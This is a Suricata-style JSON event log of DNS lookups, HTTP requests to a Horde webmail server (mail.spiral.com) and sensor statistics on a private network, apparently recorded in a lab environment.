{"timestamp":"2020-02-29T00:02:46.339559+0000","flow_id":2218946168519686,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33488,"proto":"UDP","dns":{"type":"answer","id":25550,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:02:46.422892+0000","flow_id":612061463836783,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34706,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6897},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":35877,"tx_id":0}} {"timestamp":"2020-02-29T00:02:46.754219+0000","flow_id":28091940766251,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":43799,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":1892,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:46.762300+0000","flow_id":1433087412423287,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34708,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":225,"tx_id":0}} 
{"timestamp":"2020-02-29T00:02:46.771672+0000","flow_id":1433087412423287,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34708,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":4238}} {"timestamp":"2020-02-29T00:02:46.861282+0000","flow_id":28091940766251,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43799,"proto":"UDP","dns":{"type":"answer","id":1892,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:46.861282+0000","flow_id":28091940766251,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43799,"proto":"UDP","dns":{"type":"answer","id":1892,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:47.000764+0000","flow_id":758296490976534,"event_type":"flow","src_ip":"192.168.10.122","src_port":42304,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:57:46.173334+0000","end":"2020-02-28T23:57:46.284674+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:02:47.047330+0000","flow_id":240989174631820,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34710,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 
(KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24344}} {"timestamp":"2020-02-29T00:02:47.196304+0000","flow_id":240989174631820,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34710,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24344},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/","state":"TRUNCATED","stored":false,"size":106496,"tx_id":0}} {"timestamp":"2020-02-29T00:02:47.204147+0000","flow_id":406165026970995,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":33988,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":50132,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:47.309811+0000","flow_id":406165026970995,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33988,"proto":"UDP","dns":{"type":"answer","id":50132,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:47.309811+0000","flow_id":406165026970995,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33988,"proto":"UDP","dns":{"type":"answer","id":50132,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:02:47.346710+0000","flow_id":240989174631820,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34710,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639}} {"timestamp":"2020-02-29T00:02:47.346710+0000","flow_id":240989174631820,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34710,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":29,"tx_id":1}} {"timestamp":"2020-02-29T00:02:47.376092+0000","flow_id":240989174631820,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34710,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":1656,"tx_id":1}} {"timestamp":"2020-02-29T00:02:47.390279+0000","flow_id":206771170309255,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":39566,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":15738,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:47.501100+0000","flow_id":206771170309255,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39566,"proto":"UDP","dns":{"type":"answer","id":15738,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:47.501100+0000","flow_id":206771170309255,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39566,"proto":"UDP","dns":{"type":"answer","id":15738,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:47.528668+0000","flow_id":979672010002716,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":36753,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":58469,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:47.634105+0000","flow_id":979672010002716,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36753,"proto":"UDP","dns":{"type":"answer","id":58469,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:02:47.634105+0000","flow_id":979672010002716,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36753,"proto":"UDP","dns":{"type":"answer","id":58469,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:47.663233+0000","flow_id":2193489897440047,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34712,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126}} {"timestamp":"2020-02-29T00:02:47.663233+0000","flow_id":2193489897440047,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34712,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":137,"tx_id":0}} 
{"timestamp":"2020-02-29T00:02:47.707900+0000","flow_id":240989174631820,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34710,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":592}} {"timestamp":"2020-02-29T00:02:47.707900+0000","flow_id":240989174631820,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34710,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":592},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":128,"tx_id":2}} 
{"timestamp":"2020-02-29T00:02:48.000399+0000","event_type":"stats","stats":{"uptime":13820,"capture":{"kernel_packets":132674,"kernel_drops":0},"decoder":{"pkts":132691,"bytes":92050316,"invalid":180,"ipv4":131262,"ipv6":8,"ethernet":132691,"raw":0,"null":0,"sll":0,"tcp":126258,"udp":4810,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":693,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097920},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2675,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2691,"synack":2682,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1720,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2192,"failed_udp":107},"tx":{"http":4465,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2269}},"flow_mgr":{"closed_pruned":2651,"new_pruned":15,"est_pruned":2239,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21821,"memcap_state":0,"memcap_global":0},"http":{"memuse":136750,"memcap":0}}} 
{"timestamp":"2020-02-29T00:02:51.772560+0000","flow_id":1433087412423287,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34708,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":4238},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":18578,"tx_id":0}} {"timestamp":"2020-02-29T00:02:52.000469+0000","flow_id":1308142499499515,"event_type":"flow","src_ip":"192.168.10.122","src_port":60747,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:57:51.757243+0000","end":"2020-02-28T23:57:51.868541+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:02:52.000920+0000","flow_id":1544885391843999,"event_type":"flow","src_ip":"192.168.10.122","src_port":54287,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:57:51.451231+0000","end":"2020-02-28T23:57:51.562559+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:02:52.668193+0000","flow_id":2193489897440047,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34712,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu 
Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":115,"tx_id":0}} {"timestamp":"2020-02-29T00:02:52.668279+0000","flow_id":240989174631820,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34710,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":592},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":1378,"tx_id":2}} {"timestamp":"2020-02-29T00:02:53.000849+0000","flow_id":248440938960222,"event_type":"flow","src_ip":"192.168.10.130","src_port":34696,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"failed","app_proto_tc":"http","flow":{"pkts_toserver":16,"pkts_toclient":22,"bytes_toserver":1621,"bytes_toclient":23106,"start":"2020-02-29T00:01:46.922974+0000","end":"2020-02-29T00:01:52.380357+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:02:55.000229+0000","event_type":"stats","stats":{"uptime":13827,"capture":{"kernel_packets":132775,"kernel_drops":0},"decoder":{"pkts":132777,"bytes":92092100,"invalid":180,"ipv4":131348,"ipv6":8,"ethernet":132777,"raw":0,"null":0,"sll":0,"tcp":126334,"udp":4820,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":693,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097920},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2678,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2694,"synack":2685,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1723,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2197,"failed_udp":107},"tx":{"http":4470,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2274}},"flow_mgr":{"closed_pruned":2652,"new_pruned":15,"est_pruned":2242,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":2,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65531,"rows_empty":2,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21160,"memcap_state":0,"memcap_global":0},"http":{"memuse":46973,"memcap":0}}} 
{"timestamp":"2020-02-29T00:02:56.692897+0000","flow_id":1853994208105121,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":37326,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":58577,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:56.798619+0000","flow_id":1853994208105121,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37326,"proto":"UDP","dns":{"type":"answer","id":58577,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:56.798619+0000","flow_id":1853994208105121,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37326,"proto":"UDP","dns":{"type":"answer","id":58577,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:56.883709+0000","flow_id":946128316031874,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34714,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3289}} {"timestamp":"2020-02-29T00:03:01.884497+0000","flow_id":946128316031874,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34714,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3289},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":16438,"tx_id":0}} {"timestamp":"2020-02-29T00:03:02.000199+0000","event_type":"stats","stats":{"uptime":13834,"capture":{"kernel_packets":132778,"kernel_drops":0},"decoder":{"pkts":132791,"bytes":92097298,"invalid":180,"ipv4":131362,"ipv6":8,"ethernet":132791,"raw":0,"null":0,"sll":0,"tcp":126346,"udp":4822,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":693,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098496},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2679,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2695,"synack":2686,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1724,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2198,"failed_udp":107},"tx":{"http":4471,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2275}},"flow_mgr":{"closed_pruned":2652,"new_pruned":15,"est_pruned":2242,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21491,"memcap_state":0,"memcap_global":0},"http":{"
memuse":47053,"memcap":0}}} {"timestamp":"2020-02-29T00:03:02.001199+0000","flow_id":2014930921353933,"event_type":"flow","src_ip":"192.168.10.130","src_port":34692,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":17,"pkts_toclient":18,"bytes_toserver":2240,"bytes_toclient":17008,"start":"2020-02-29T00:01:20.225997+0000","end":"2020-02-29T00:02:01.561213+0000","age":41,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:03:02.101930+0000","flow_id":1908200990740010,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":42172,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":23108,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:03:02.213187+0000","flow_id":1908200990740010,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42172,"proto":"UDP","dns":{"type":"answer","id":23108,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:03:02.213187+0000","flow_id":1908200990740010,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42172,"proto":"UDP","dns":{"type":"answer","id":23108,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:03:02.356770+0000","flow_id":1392564397028430,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34716,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3659}} {"timestamp":"2020-02-29T00:03:03.000701+0000","flow_id":1508640163537177,"event_type":"flow","src_ip":"192.168.10.122","src_port":55863,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:58:02.368921+0000","end":"2020-02-28T23:58:02.481155+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:03:05.506519+0000","flow_id":1901152949615255,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59490,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":19220,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:03:05.617809+0000","flow_id":1901152949615255,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59490,"proto":"UDP","dns":{"type":"answer","id":19220,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:03:05.617809+0000","flow_id":1901152949615255,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59490,"proto":"UDP","dns":{"type":"answer","id":19220,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 